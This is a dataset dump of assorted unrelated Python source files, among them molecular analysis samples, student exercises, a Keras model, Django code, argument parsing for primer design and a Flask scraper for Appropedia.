sys.stdout.write(out.getvalue())\n \n mods = {}\n if hasattr(args.outpath, 'name'):\n outpath = args.outpath.name\n else:\n outpath = None\n \n for mod in task.get_results():\n mods[mod.name] = mod.__dict__\n \n if mod.logo is not None:\n if outpath is None:\n del mods[mod.name]['logo']\n logging.warning('Skipping logo for \"%s\" because the output is stdout.', mod.name)\n else:\n dest = outpath + '.' + hashlib.md5(mod.logo).hexdigest() + '.jpg'\n with open(dest, 'wb') as stream:\n stream.write(mod.logo)\n \n mods[mod.name]['logo'] = os.path.basename(dest)\n\n if mod.parent is not None:\n mods[mod.name]['parent'] = mod.parent.name\n \n if args.pretty:\n json.dump(mods, args.outpath, indent=4)\n else:\n json.dump(mods, args.outpath, separators=(',', ':'))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":7293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488531106","text":"#!/usr/bin/env python\n# (C) 2017 OpenEye Scientific Software Inc. All rights reserved.\n\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n########################################################################\n# Perform a ramachandran analysis on your protein, print outliers\n########################################################################\n\nimport sys\nfrom openeye import oechem\n\n\ndef RamaCheck(mol):\n # @ \n # Loop over the CA atoms in the protein\n for atom in mol.GetAtoms(oechem.OEIsCAlpha()):\n rama = oechem.OERamachandranAnalysis(atom)\n # Print out information about outliers for further analysis\n if rama.GetRamaCategory() == oechem.OERamaCategory_Outlier:\n res = oechem.OEAtomGetResidue(atom)\n print(\"Found: {}\".format(oechem.OEGetRamachandranCategoryName(rama.GetRamaCategory())))\n print(\" Residue: {} {} {}\"\n .format(res.GetName(), res.GetResidueNumber(), res.GetChainID()))\n ramatype = oechem.OEGetRamachandranTypeName(rama.GetRamaType())\n print(\" Type: {}, Score: {}\".format(ramatype, rama.GetRamaScore()))\n # @ \n\n\ndef ReadProteinFromPDB(pdb_file, mol):\n ifs = oechem.oemolistream()\n flavor = oechem.OEIFlavor_PDB_Default | oechem.OEIFlavor_PDB_DATA | oechem.OEIFlavor_PDB_ALTLOC\n ifs.SetFlavor(oechem.OEFormat_PDB, flavor)\n\n if not ifs.open(pdb_file):\n oechem.OEThrow.Fatal(\"Unable to open %s for reading.\" % pdb_file)\n\n temp_mol = oechem.OEGraphMol()\n if not oechem.OEReadMolecule(ifs, temp_mol):\n oechem.OEThrow.Fatal(\"Unable to read molecule from %s.\" % pdb_file)\n ifs.close()\n\n fact = oechem.OEAltLocationFactory(temp_mol)\n mol.Clear()\n fact.MakePrimaryAltMol(mol)\n return (mol)\n\n\ndef main(argv=[__name__]):\n if len(argv) != 2:\n oechem.OEThrow.Usage(\"%s \" % argv[0])\n mol = oechem.OEGraphMol()\n ReadProteinFromPDB(argv[1], mol)\n RamaCheck(mol)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"venv/Lib/site-packages/openeye/docexamples/bio/RamaOutlierCheck.py","file_name":"RamaOutlierCheck.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89986050","text":"cijferICOR = 6.5\ncijferPROG = 7.8\ncijferCSN = 6.9\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN)/3\nbeloning = gemiddelde * 30 * 3\nimport math\ngemiddeldeG = (math.floor(gemiddelde*10)/10)\nbeloningG = round(beloning, 1)\nprint('Mijn cijfers (gemiddeld een ', gemiddeldeG, ') leveren een beloning op van ', beloningG, 'euro!')\n\n\n#Mijn cijfers (gemiddeld een 7.0 ) leveren een beloning op van 636.0 euro!","sub_path":"les4/1Getallen, Strings and Conversion.py","file_name":"1Getallen, Strings and Conversion.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"365288186","text":"import math\n\n\"\"\" count of 64s \"\"\"\nn = 0\n\"\"\" samples since last 64 \"\"\"\nfraction = 0\nticks = 0\n\"\"\" samples in beat \"\"\"\nsize64 = 1000\nsize1 = 1000\nsamplerate = 44100\nsubscribers = []\nnextBeat = False\n\ndef setSubscribers(list):\n global subscribers\n subscribers = list\n\ndef onBeat():\n pass\n\ndef updateBpm(bpm, samplerate = 44100):\n global size64\n global size1\n size1 = (samplerate / (bpm / 60)) * 4\n size64 = size1 / 64\n samplerate = samplerate\n\ndef move(frames):\n global beattime\n global n\n global samplerate\n global fraction\n global ticks\n global nextBeat\n global size64\n global size1\n fraction += frames\n ticks = (ticks + frames) % size1\n n = math.floor(ticks / size64)\n if fraction > size64:\n fraction = fraction % size64 \n for sub in subscribers:\n getattr(sub, 'autoplayTick')(n, fraction)\n\n\"\"\"\ndef isReady():\n global ready\n return ready\n\ndef notifyAll(midiController, samplesController):\n global fraction\n global beattime\n global ready\n global fraction\n global n\n fraction = fraction % beattime\n midiController.autoplayTick(n, fraction / beattime)\n samplesController.autoplayTick(n, fraction / beattime)\"\"\"","sub_path":"autoplayController.py","file_name":"autoplayController.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477958048","text":"from keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Embedding, Dropout, Conv1D, MaxPooling1D\nfrom src.models.base_model import Base\n\n\nclass CnnBilstm(Base):\n def __init__(self, vocab_size, max_length, embeddings_matrix):\n super().__init__()\n self.vocab_size = vocab_size\n self.max_length = max_length\n self.embeddings_matrix = embeddings_matrix\n\n def setup(self):\n model = Sequential()\n model.add(Embedding(self.vocab_size, 50, input_length=self.max_length, weights=[self.embeddings_matrix],\n trainable=False))\n model.add(Dropout(.2))\n\n model.add(Conv1D(128, 5, activation=\"relu\"))\n model.add(MaxPooling1D(pool_size=4))\n\n model.add(Bidirectional(LSTM(128)))\n model.add(Dropout(.5))\n\n model.add(Dense(66, activation=\"softmax\"))\n\n self.base = model\n","sub_path":"src/models/cnn_bilstm.py","file_name":"cnn_bilstm.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"628756821","text":"############################################################################\n# CONFIDENTIAL\n#\n# Copyright (c) 2020 Qualcomm Technologies International, Ltd.\n# %%version\n#\n############################################################################\n\nfrom csr.dev.fw.firmware_component import FirmwareComponent\nfrom csr.dev.model import interface\nfrom .structs import IAdkStructHandler\n\nclass ConnectionManager(FirmwareComponent):\n ''' This class reports the connection manager state and provides some\n Bluetooth related helper functions. '''\n\n # Number of microseconds per BT slots\n MICROSECONDS_PER_SLOT = 625\n\n # Connection library lp_power_mode value for sniff\n SNIFF_MODE = 1\n\n @classmethod\n def slots_to_ms(cls, slots):\n ''' Convert Bluetooth slots to milliseconds '''\n return cls.slots_to_us(slots) / 1000.0\n\n @classmethod\n def slots_to_us(cls, slots):\n ''' Convert Bluetooth slots to microseconds '''\n return (slots * cls.MICROSECONDS_PER_SLOT)\n\n @property\n def connections(self):\n ''' Returns the connection manager's array of ACL connections '''\n return self.env.cu.connection_manager_list.local.connections\n\n @property\n def active_connections_count(self):\n ''' Returns the number of active connections in the connection manager '''\n return len(list(self._active_connections_generator()))\n\n @property\n def active_connections_tpaddrs(self):\n ''' Return a list of active connection tpaddrs '''\n return [active[0] for active in self._active_connections_generator()]\n\n def _active_connections_generator(self):\n ''' Iterates the conneciton manager list yielding active connections '''\n connections = self.connections\n with connections.footprint_prefetched():\n for conn in connections:\n tpaddr = IAdkStructHandler.handler_factory(\"tp_bdaddr\")(self._core, conn.tpaddr)\n if not tpaddr.typed_bdaddr.bdaddr.is_zero():\n yield (tpaddr, conn)\n\n def _generate_report_body_elements(self):\n ''' Report the list of connections'''\n grp = interface.Group(\"Connections\")\n tbl = interface.Table([\"TpBdAddr\", \"Bitfields\", \"Link Policy\", \"Details\"])\n for (tpaddr, conn) in self._active_connections_generator():\n lp_state = conn.lp_state.pt_index.symbolic_value\n details = \"\"\n if tpaddr.is_bredr():\n if conn.mode.value == self.SNIFF_MODE:\n si_slots = conn.sniff_interval.value\n details = \"Sniff mode {} slots ({}ms)\".format(si_slots, self.slots_to_ms(si_slots))\n elif tpaddr.is_ble():\n details = \"Connection Interval={}, Slave Latency={}\".format(conn.conn_interval, conn.slave_latency)\n tbl.add_row([tpaddr, conn.bitfields, lp_state, details])\n grp.append(tbl)\n return [grp]\n","sub_path":"adk/tools/pylib/adk/caa/connection_manager.py","file_name":"connection_manager.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152593401","text":"from django.test import TestCase\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.hashers import check_password\nfrom nose.tools import eq_, ok_\nfrom bundles.tests.factories import BundleFactory, LinkFactory\nfrom bundles.serializers import (\n LinkSerializer,\n CreateLinkSerializer,\n BundleSerializer,\n CreateBundleSerializer\n)\n\n\nclass TestCreateUserSerializer(TestCase):\n\n def setUp(self):\n self.bundle = model_to_dict(BundleFactory())\n\n def test_create_link_serializer_with_empty_data(self):\n serializer = CreateLinkSerializer(data={'url': '', 'title': ''})\n eq_(serializer.is_valid(raise_exception=True), ValueError)\n\n def test_create_link_serializer_with_invalid_url_with_no_protocol_specified(self):\n \"\"\" Test that link_data with an invalid url (because there is no http(s)) \n returns False\n \"\"\"\n # No http(s) specified in beginning of url\n serializer = CreateLinkSerializer(data={'url': 'google.com', 'title': 'google'})\n eq_(serializer.is_valid(raise_exception=True), ValueError)\n\n def test_create_link_serializer_with_valid_url(self):\n \"\"\" Test that link_data with a valid url\n returns True\n \"\"\"\n serializer = CreateLinkSerializer(data={'url': 'https://google.com', 'title': 'google'})\n eq_(serializer.is_valid(raise_exception=True), True)","sub_path":"bundle-api/bundles/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390463125","text":"from django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('home.urls')),\n path('accounts/', include('allauth.urls')),\n path('products/', include('products.urls')),\n path('shopping_bag/', include('shopping_bag.urls')),\n path('reviews/', include('reviews.urls')),\n path('checkout/', include('checkout.urls')),\n path('user_profile/', include('user_profile.urls')),\n] + static(settings.MEDIA_ROOT, document_root=settings.MEDIA_ROOT)\n","sub_path":"an_interesting_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649773657","text":"# from .Keys import GMaps\nfrom Keys import GMaps\nimport requests\nimport pandas as pd\n\n# (1) - From front end to here\n\ndef latlongAddress(add):\n\n bikes = pd.read_csv(\"Hubway_Stations_as_of_July_2017.csv\")\n address = add.replace(\" \", \"+\")\n # URL = \"https://maps.googleapis.com/maps/api/geocode/json?latlng=\"+ str(lat) + \",\" + str(long) + \"&key=\" + GMaps\n URL = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + address + \"&key=\" + GMaps\n r = requests.get(url = URL)\n data = r.json()\n print(data)\n return [data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"], data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]]\n","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333441744","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-x86_64/egg/lib/parse_args.py\n# Compiled at: 2017-03-26 22:07:48\nimport argparse\nfrom sys import stdin\nfrom os.path import abspath\nfrom os.path import expanduser\n\nclass FullPaths(argparse.Action):\n \"\"\"Expands user- and relative-paths\n \"\"\"\n\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, abspath(expanduser(values)))\n\n\ndef parse_args():\n \"\"\"Parses the command line\n\n Return:\n -----\n ArgParse: An ArgsParse object with the settings for the genprimers run\n\n \"\"\"\n parser = argparse.ArgumentParser(description='Process some integers.')\n subparsers = parser.add_subparsers(help='sub-commands help', dest='subparser_name')\n indx_parser = subparsers.add_parser('index', help='create an index for a set of' + ' sequences')\n indx_parser.add_argument('fasta', help='FASTA file with the sequences' + 'to be indexed', metavar='FASTA')\n list_parser = subparsers.add_parser('list', help='list all available sequences ' + ' to generate primers')\n list_parser.add_argument('list_fasta', help='FASTA file with the sequences', metavar='FASTA')\n primers_parser = subparsers.add_parser('primers', help='create a set of primers for' + ' a subset, given a universe of' + ' sequences', add_help=False)\n primers_parser.add_argument('fasta_indx', help='Indexed FASTA containing all the' + ' sequences', metavar='UNIVERSE', action=FullPaths)\n primers_parser.add_argument('targets_ids', help='File containing the list of' + ' identifiers of' + ' the target sequences (default stdin)', metavar='TARGETS', nargs='?', type=argparse.FileType('r'), default=stdin)\n primers_parser.add_argument('output_prefix', help='Output prefix for the results', metavar='OUTPUT')\n thermo_args = primers_parser.add_argument_group('thermodynamic arguments')\n thermo_args.add_argument('-p', '--op-temp', dest='op_temp', help='Operation temperature in Celsius.' + ' Operation temperature is the lower' + ' temperature in the PCR cycle (default 50)', type=float, metavar='FLOAT', default=50.0)\n thermo_args.add_argument('-j', '--prim-con', dest='prim_con', help='Primer concentration in Molar' + ' (default 2e-7)', type=float, metavar='FLOAT', default=2e-07)\n thermo_args.add_argument('-n', '--na', dest='na', help='Monovalent cations concentration in Molar' + ' (default 5e-3)', type=float, metavar='FLOAT', default=0.005)\n thermo_args.add_argument('-m', '--mg', dest='mg', help='Divalent cations concentration in Molar' + ' (default 0)', type=float, metavar='FLOAT', default=0)\n thermo_args.add_argument('-d', '--sdss', dest='sdss', help='Threshold to determine SDSS region in' + ' the primers (default 0.01)', type=float, metavar='FLOAT', default=0.01)\n fil_args = primers_parser.add_argument_group('primer filtering arguments')\n fil_args.add_argument('-k', '--min-prim-size', dest='min_prim_size', help='Mimimum primer size in bp (default 18)', type=int, metavar='INT', default=18)\n fil_args.add_argument('-K', '--max-prim-size', dest='max_prim_size', help='Maximum primer size in bp (default 22)', type=int, metavar='INT', default=22)\n fil_args.add_argument('-t', '--min-melt', dest='min_melt', help='Minimum melting temperature in Celsius' + ' allowed for primers (default 60)', type=float, metavar='FLOAT', default=60.0)\n fil_args.add_argument('-T', '--max-melt', dest='max_melt', help='Maximum melting temperature in Celsius ' + ' allowed for primers (default 65)', type=float, metavar='FLOAT', default=65.0)\n fil_args.add_argument('-s', '--dgss', dest='dgss', help='Primers with a minimum energy (dG) in' + ' in kcal/mol for hairpin formation below this' + ' value will be discarded (default -1.5)', type=float, metavar='FLOAT', default=-1.5)\n fil_args.add_argument('-x', '--dghm', dest='dghm', help='Primers with a minimum energy (dG) in' + ' kcal/mol for homodimer formation (dG) below' + ' this value will be discarded (default' + ' -8.5)', type=float, metavar='FLOAT', default=-8.5)\n fil_args.add_argument('-g', '--min-gc', dest='min_gc', help='Minimum GC percentage for primers' + ' (default 30)', type=float, metavar='FLOAT', default=30.0)\n fil_args.add_argument('-G', '--max-gc', dest='max_gc', help='Maximum GC percentage for primers' + ' (default 70)', type=float, metavar='FLOAT', default=70.0)\n fil_args.add_argument('-l', '--lcc', dest='lcc', help='Minimum local compisition complexity' + ' for the primer (default 1.0)', type=float, metavar='FLOAT', default=1.0)\n fil_args.add_argument('-e', '--edit-distance', dest='edit_distance', help='Maximum number of mismatches between ' + ' the primer and the target sequences (default 3)', type=int, metavar='INT', choices=[\n 0, 1, 2, 3], default=3)\n prim_args = primers_parser.add_argument_group('primers pairs arguments')\n prim_args.add_argument('-a', '--min-amp-size', dest='min_amp_size', help='Mimimum amplicon size in bp for a' + ' given set of primers (default 100)', type=int, metavar='INT', default=100)\n prim_args.add_argument('-A', '--max-amp-size', dest='max_amp_size', help='Maximum amplicon size in bp for a' + ' given set of primers (default 300)', type=int, metavar='INT', default=300)\n prim_args.add_argument('-F', '--tragets-fraction', dest='target_frac', help='Minimum fraction of target sequences' + ' a primer must to detect in order to be' + ' considered (default 0.9)', type=float, metavar='FLOAT', default=0.9)\n prim_args.add_argument('-X', '--ppdghm', dest='ppdghm', help='Primers pairs with a minimum energy (dG) in' + ' kcal/mol for heterodimer formation below this' + ' value will be descarded (default -8.5)', type=float, metavar='FLOAT', default=-8.5)\n out_args = primers_parser.add_argument_group('output arguments')\n out_args.add_argument('-P', '--prefix', help='Prefix to be added to the primers' + ' identifiers (default PB)', dest='primers_prefix', default='PB', metavar='STRING')\n out_args.add_argument('-r', '--records', help='Report up to this number of primer pairs' + ' (default 10)', dest='records', type=int, default=10, metavar='INT')\n misc_args = primers_parser.add_argument_group('miscellaneous arguments')\n misc_args.add_argument('-h', '--help', action='help', help='Show this help message and exit')\n misc_args.add_argument('-v', '--verbose', help='Control the verbose level (default 1)', dest='verb_level', default='1', choices=[\n 0, 1, 2])\n args = parser.parse_args()\n return args","sub_path":"pycfiles/genprimers-0.0.1-py2.7/parse_args.py","file_name":"parse_args.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314818883","text":"start_value = int(input(\"Enter start value> \"))\nend_value = int(input(\"Enter finish value> \"))\nstart = start_value\nend = end_value\ncounter = 0\nif end_value < start_value:\n start = end_value\n end = start_value\nprint(\"а. Все числа диапазона\")\nfor i in range(start, end + 1, 1):\n print(i)\nprint(\"b.Все числа в убывающем порядке\")\nfor i in range(end, start - 1, -1):\n print(i)\nprint(\"c.Все числа кратные '7' \")\nfor i in range(start, end + 1, 1):\n if i % 5 == 0:\n counter = counter + 1\n if i % 7 == 0:\n print(i)\nprint(f\"d.Количество чисел кратных '5' равно: {counter}\")","sub_path":"Python_Homework/Python_HW2/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313512586","text":"import time\nfrom multiprocessing import Process, Lock\n\n\ndef l(lock, num):\n lock.acquire()\n print(\"Hello Num: %s\" % (num))\n time.sleep(1)\n lock.release()\n\n\nif __name__ == '__main__':\n lock = Lock() # 这个一定要定义为全局\n for num in range(20):\n Process(target=l, args=(lock, num)).start() # 这个类似多线程中的threading,但是进程太多了,控制不了。\n","sub_path":"thread_process/pool_lock_demo.py","file_name":"pool_lock_demo.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"305005177","text":"from flask import Flask, render_template, request, send_file\nfrom urllib.request import urlopen, Request\nimport json\nimport csv\nimport os.path\nimport os\nimport re\nimport yaml\n\ndef create_app(enviroment):\n app = Flask(__name__)\n app.config.from_object(enviroment)\n\n return app\n\n#Funcion que convierte los datos en cadena de textos separadas en espacios\n# Function to convert \ndef listToString(s): \n # initialize an empty string\n str1 = \"\" \n # traverse in the string \n for ele in s: \n str1 += ele+\" \" \n return str1\n\n#Funcion que convierte los datos en cadena de textos separadas en |\n# Function to convert \ndef listToString2(s): \n # initialize an empty string\n str1 = \"\" \n # traverse in the string \n for ele in s: \n str1 += ele+\"|\" \n return str1\n\n\n#/--------------------ARREGLOS AUXILIARES--------------------/\n#Arreglo donde guardara los datos extraidos de la cadena content\ndata = []\n#Arreglo donde guardara los encabezados del archivo csv\nheader = ['image', 'caption', 'keywords', 'uses', 'instance-of', 'date-completed', 'date-published', 'date-updated', 'sdg']\n#Arreglo donde guardara los nombres de las imagenes\nimages = []\n#Arreglo donde guardara las caption de las imagenes\ncaptions = []\n#Arreglo donde guardara los keywords\nkeyAllArray = []\n#Arreglo donde guardara las fechas de actualizaciones\nupdates = []\n\napp = Flask(__name__, template_folder=\"templates\")\n\n\n@app.route(\"/\", methods = [\"POST\", \"GET\"])\ndef home():\n if request.method == \"POST\":\n param = request.form [\"param\"]\n escape = \" \"\n articulo = param.replace(escape, '%20')\n newarticulo = articulo.strip('%20')\n url = 'https://www.appropedia.org/w/api.php?action=query&prop=revisions&titles='+newarticulo+'&rvslots=*&rvprop=content&format=json'\n accessreq = Request(url, headers = {\"User-Agent\": \"Mozilla/5.0\"})\n leer = urlopen(accessreq)\n formatojson = json.loads(leer.read())\n milista = []\n for clave in formatojson.items():\n milista.append(clave)\n readytogo = \"\".join(str(milista))\n \n #mis regex\n #image and caption\n file = re.compile('\\[File:.*?\\]') \n #keywords\n keywords = re.compile('(?<=\\|keywords =)([^|]+)(?=\\|)')\n #uses\n uses = re.compile('(?<=\\|uses =)([^|]+)(?=\\|)')\n #instance-of\n partoff = re.compile('(?<=\\|part-of =)([^}]+)(?=\\})')\n #date-completed\n completed = re.compile('(?<=\\|completed =)([^}]+)(?=\\})')\n #date-published\n published = re.compile('(?<=\\|published =)([^|]+)(?=\\|)')\n #date-updated\n update = re.compile('(?<=\\=Update)([^=]+)(?=\\=)')\n #sdg\n sdg = re.compile('(?<=\\|sdg =)([^|]+)(?=\\|)')\n\n #/--------------------EXTRACCION DE LA CADENA--------------------/\n #Variable que extrae el match o lo que acierta del regex file\n files = re.findall(file, readytogo)\n #Variable que extrae el match o lo que acierta del regex keywords\n keywordsAll = re.findall(keywords, readytogo)\n #Variable que extrae el match o lo que acierta del regex sdg\n SDGs = re.findall(sdg, readytogo)\n #Variable que extrae el match o lo que acierta del regex published\n datePublished = re.findall(published, readytogo)\n #Variable que extrae el match o lo que acierta del regex uses\n usesAll = re.findall(uses, readytogo)\n #Variable que extrae el match o lo que acierta del regex completed\n dateCompleted = re.findall(completed, readytogo)\n #Variable que extrae el match o lo que acierta del regex partof\n partedof = re.findall(partoff, readytogo)\n #Variable que extrae el match o lo que acierta del regex partof\n dateupdated = re.findall(update, readytogo)\n\n #/--------------------IMPRESION DE LA CADENA--------------------/\n #Imprimimos lo que se obtuvo en la variable files\n for a in files:\n string = str(a)[6:-1]\n b = string.split('|')\n b1 = b[0]\n images.append(b1)\t\n #Imprimimos lo que se obtuvo en la variable files\n for k in files:\n string = str(a)[6:-1]\n l = string.split('|')\n l1 = b[2]\n l2 = str(l1)[7:]\n captions.append(l2)\n #Imprimimos lo que se obtuvo en la variable keywordsAll\n for c in keywordsAll:\n string = str(c)[1:-1]\n d = string.split(', ')\n for element in d:\n keyAllArray.append(element)\n #Imprimimos lo que se obtuvo en la variable usesAll\n for g in usesAll:\n string = str(g)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable partedof\n for i in partedof:\n string = str(i)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable dateCompleted\n for h in dateCompleted:\n string = str(h)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable datePublished\n for f in datePublished:\n string = str(f)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable updated\t\n for j in dateupdated:\n string = str(j)[1:]\n k = string.split('\\n')\n updates.append(k[0])\n #Imprimimos lo que se obtuvo en la variable SDGs\n for e in SDGs:\n string = str(e)[1:-1]\n data.append(string.rstrip())\n\n #/--------------------CONVERSION DE LISTAS EN CADENAS DE TEXTOS--------------------/\n #Variable donde guardara la conversion del arreglo images\n imagestr = listToString2(images)\n #Variable donde guardara la conversion del arreglo captions\n captionstr = listToString2(captions)\n #Variable donde guardara la conversion del arreglo keyAllArray\n keywordstr = listToString2(keyAllArray)\n #Variable donde guardara la conversion del arreglo updates\n updatestr = listToString2(updates)\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento image dentro del header\n data.insert(header.index('image'), str(imagestr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento caption dentro del header\n data.insert(header.index('caption'), str(captionstr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento keywords dentro del header\n data.insert(header.index('keywords'), str(keywordstr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento date-updated dentro del header\n data.insert(header.index('date-updated'), str(updatestr)[:-1])\n #Variable donde guardara la conversion del arreglo header ()\n headerstr = listToString(header)\n #Variable donde guardara la conversion del NUEVO arreglo data\n datastr = listToString(data)\n #Imprimimos lo que se obtuvo en la variable headerstr\t\n #print(headerstr)\n #Imprimimos lo que se obtuvo en la variable datastr\t\n #print(datastr)\n\n dict_file = [{''+header[0]+'':images},\n {''+header[1]+'':captions},\n {''+header[2]+'':keyAllArray},\n {''+header[3]+'':data[3]},\n {''+header[4]+'':data[4]},\n {''+header[5]+'':data[5]},\n {''+header[6]+'':data[6]},\n {''+header[7]+'':updates},\n {''+header[8]+'':data[8]}\n ] \n\n #/--------------------ARCHIVO CSV--------------------/\n #with open('Infobox.csv', 'w', newline='') as file:\n # #Usamos la función se utiliza para crear un objeto de tipo writer y donde pasamo un parámetro adicional que es el delimiter=';' donde queremos usar el ; como delimitador en el archivo Infobox.csv\n # writer = csv.writer(file, delimiter=';')\n # #La función writer.writerow() se utiliza para escribir en el archivo CSV.\n # writer.writerow(header)\n # writer.writerow(data) \n #p = \"Infobox.csv\"\n\n #/--------------------ARCHIVO YAML--------------------/\n with open(r'Infobox.yaml', 'w') as file:\n documents = yaml.dump(dict_file, file)\n p = \"Infobox.yaml\"\n return send_file(p, as_attachment=True)\n else:\n return render_template(\"formulario.html\")\n\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"568861788","text":"def exclude_first_name(name):\n names=name.split(\",\")\n result=[]\n for i in names:\n result.append(i[1:])\n return result\n\nfirst_names = exclude_first_name(\"황광희,이효리,김지훈,이지은,고수\")\nprint(first_names)\n\ndef is_pangram(sentence):\n right = \"abcdefghijklmnopqrstuvwxyz\"\n s = sentence.replace(\" \",\"\").lower()\n for i in right:\n if i not in s:\n return False\n return True\n\n# 알파벳이 모두 포함된 문자열은 True 값을 반환\nprint(is_pangram(\"abcdefghijklmnopqrstuvwxyz\"))\nprint(is_pangram(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"))\nprint(is_pangram(\"The quick brown fox jumps over the lazy dog\"))\nprint(is_pangram(\"Jock nymphs waqf drug vex blitz\"))\n# 알파벳 중 글자가 하나씩 빠진 문자열은 False 값을 반환\nprint(is_pangram(\"The quik brown fox jumps over the lazy dog\"))\nprint(is_pangram(\"The quick brown fx jumps over the lazy do\"))\nprint(is_pangram(\"ock nymphs waqf drug vex blitz\"))\nprint(is_pangram(\"Jock nymphs waqf drug vex bltz\"))\n\n\ndef num_to_list(num):\n list=[]\n zeroCnt = len(str(num))-1\n for i in (str(num)):\n list.append(int(i)*(10**zeroCnt))\n zeroCnt-=1\n return list\n\nli1 = num_to_list(54321)\nli2 = num_to_list(1004)\nprint(li1)\nprint(li2)\n# 리스트의 모든 값을 더하는 sum 함수를 반환된 리스트에 적용하면 원래 값을 반환해야 함\nprint(sum(num_to_list(54321)))\nprint(sum(num_to_list(1004)))\n\ndef print_weekday(day):\n num = day%7\n day_tuple={0:\"화요일\",1:\"수요일\",2:\"목요일\",3:\"금요일\",4:\"토요일\",5:\"일요일\",6:\"월요일\"}\n print(day_tuple[num])\n\nfor i in range(1,32):\n print_weekday(i)\n\n\ndef snakecase_to_camelcase(sentence):\n s = sentence.split(\"_\")\n camelcase=\"\"\n for i in range(1, len(s)):\n camelcase+=s[i][0].upper()+s[i][1:]\n camelcase=s[0]+camelcase\n return camelcase\n\ncc1 = snakecase_to_camelcase(\"hello\")\ncc2 = snakecase_to_camelcase(\"hello_world\")\ncc3 = snakecase_to_camelcase(\"snake_case_to_camel_case\")\nprint(cc1)\nprint(cc2)\nprint(cc3)","sub_path":"WS/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57776772","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom Currency import Currency\n\nclass CurrencyCheckReport(Report):\n\n def defaults(self):\n specs = self.getRecord()\n specs.gDate = today()\n\n def getRates(self,cur):\n specs = self.getRecord()\n # same as paste currency\n from ExchangeRate import ExchangeRate\n exRate = ExchangeRate.getRate(cur, specs.gDate)\n CurrencyRate = exRate.Value\n bRate = ExchangeRate.getRate(Currency.getBase2(), specs.gDate)\n BaseRate = bRate.Value\n return (CurrencyRate,BaseRate)\n\n def run(self):\n specs = self.getRecord()\n (b1,b2) = 